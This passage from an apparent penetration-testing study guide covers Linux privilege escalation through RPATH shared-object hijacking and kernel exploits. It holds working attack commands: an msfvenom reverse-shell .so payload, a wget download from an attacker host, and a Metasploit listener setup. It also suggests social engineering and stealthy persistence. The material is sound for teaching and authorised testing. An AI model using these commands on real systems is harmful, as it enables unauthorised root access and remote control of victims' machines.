program.so => /usr/lib/program/program.so (0x0000007fb12f120000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x0000007fb121121200)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x0000007fb12f1212300)

We've determined that program will load shared objects from the /tmp/program/libs directory defined with the RPATH option (as we saw with objdump), and that it will load them before anything in /lib or /usr/lib. Technically, we could pick any of the above and create a shared object with the same name. However, we'll go with program.so as the name of our malicious shared object file.

Generate Backdoored Shared Object

We can create our backdoored program.so shared object with msfvenom:

msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker LPORT> -f elf-so -o program.so
python -m SimpleHTTPServer 80

We are creating a .so with the name of one of the shared objects we know program loads at runtime, using a stageless reverse TCP shell payload pointing to our attacker machine and port, where we'll also set up a listener for the same payload.

On target system:

cd /tmp/program/libs && wget http://attacker_ip/program.so

Start a listener on the attacker machine and execute program:

msf > use exploit/multi/handler
msf exploit (multi/handler) > set payload linux/x64/shell_reverse_tcp
msf exploit (multi/handler) > set LHOST <attacker_ip>
msf exploit (multi/handler) > set LPORT <attacker_port>
msf exploit (multi/handler) > exploit -j

Important

An important point to note is that in order to elevate our privileges with this technique, the program that loads our shared object must be executed by a user with higher privileges, or be scheduled as part of a cron job that runs as root, etc.

We have several options:

  • We either wait for the program to be launched by a user with elevated privileges, at which point a reverse shell is initiated back to our attacker machine in the context of that user's privileges (hopefully root).

  • Or, in an ideal scenario, the "interesting" program we found is already configured as a service, or run from a cron job as root, at which point we simply wait for the cron job to run.

  • We could also use social engineering to try and persuade an end-user to execute the program.

  • This reinforces the importance of comprehensive information gathering and enumeration in regards to the search for root-owned services and root-owned cron jobs that a low privileged user could modify.

  • Alternatively, if we are already root on the system, we can use this method as a stealthy persistence mechanism.

Introduction to Kernel Exploits

Kernel exploits are one of the most prolific methods for elevating privileges on Linux machines with outdated kernels. New vulnerabilities are discovered and exploits are developed on practically a monthly basis for varying distributions and architectures.

New privilege escalation vulnerabilities and associated exploits affecting the Linux kernel are disclosed regularly.

The kernel is the core of the Linux operating system. It was initially conceived and created by Linus Torvalds in 1991 and has since grown to support dozens of computing architectures, powering routers, servers, workstations, firewalls and even mobile devices such as Android phones. (Game consoles such as the PlayStation, by contrast, run an operating system based on FreeBSD.) Being open source with thousands of contributors and users worldwide makes the kernel a high-value target, both for zero-days and for more popular, well-known attack vectors.

There are many different categories of kernel exploits, some of the most common are:

  • Buffer Overflows

  • Memory Corruption

  • Denial-Of-Service

  • Race Conditions

When not in the denial-of-service category, these most often allow arbitrary code execution and privilege escalation.

Linux kernel exploits, for our purposes, will typically be either pre-compiled ELF binaries, C source code (.c files) which we compile ourselves, or modules available in exploit frameworks such as Metasploit.

A word of caution about exploit code

As with any other file downloaded from the internet from an unknown source, blindly compiling or executing exploits whose inner workings we don't understand could result in our own system being compromised, and could also expose the systems we're testing to compromise by unknown actors.

Always take precautions when compiling and executing exploit code. Go the extra mile and try to understand what the exploit is actually doing behind the scenes.

This is particularly true of the shellcode embedded in exploits, as the shellcode could be doing something malicious: opening up a bind shell on your system, initiating a reverse shell to an attacker's system or, worse, deleting your entire operating system (rm -rf *).

For the most part, exploits originating from established frameworks (such as Metasploit) are generally OK since many eyes review them, but take extra caution with other exploit sources.

Find the right kernel exploit

There are several tools available to us for searching for exploits. One of these is searchsploit, which is pre-installed on Kali Linux. With searchsploit, we simply run the command followed by a search term:

searchsploit "linux kernel debian"

Another useful tool, written in Perl, is a Linux exploit suggester:

Run the Linux exploit suggester locally on your attacker system while specifying the kernel version of your target with the -k switch.

If we run it without supplying the -k option, it simply executes a uname -a command and determines the kernel version of the system it is running on.

Once we've identified several kernel exploits valid for our target's kernel version, we can move on to downloading the source code to the target. Keep in mind that not all exploits will be "click-and-shoot"; many require parameters that we'll need to supply on the exploit command line in order to get them working.

An example of this is the UDEV < 1.4.1 - Local Privilege Escalation exploit, which affects the 2.6 kernel and requires that we determine the PID of the udevd netlink socket, and also that we create a file /tmp/run containing whatever code we'd like executed as root.

Compiling Exploit Code

# confirm a compiler is available and note its version
gcc --version
# compile the exploit source into a binary
gcc exploit.c -o exploit
# gcc output is already executable; chmod is only needed if the binary
# was transferred without the execute bit
chmod +x exploit
./exploit

Sometimes, more complex compile options are required for our exploit. In that case, oftentimes the exploit code itself will include, within its commented section, the command line we can use to compile it. It will also include usage details about the exploit.

Other times, we will find ourselves in a situation where our target is a 32-bit architecture and doesn't have gcc installed, and we need to compile the exploit on our 64-bit attacker machine. Use the -m32 flag to achieve this:

gcc -m32 exploit.c -o exploit
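Before reaching for -m32, it helps to confirm what the target actually is. A quick sketch, run on the target (gcc availability varies per system; empty output from the second check means we must compile elsewhere):

```shell
# x86_64 means a 64-bit kernel/userland; i686 or i386 means -m32-style
# 32-bit output is required when cross-compiling from a 64-bit machine.
uname -m

# Does the target even have a compiler? Falls through with a note if not.
command -v gcc || echo "no gcc on this host"
```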

Lateral Movement - Study Guide

Lateral movement involves moving through the target organization from machine to machine and server to server, using credentials obtained in other phases, further strengthening our foothold within the target infrastructure toward the ultimate objective as defined by the customer.

Data Exfiltration - Study Guide

Maintaining Access - Study Guide
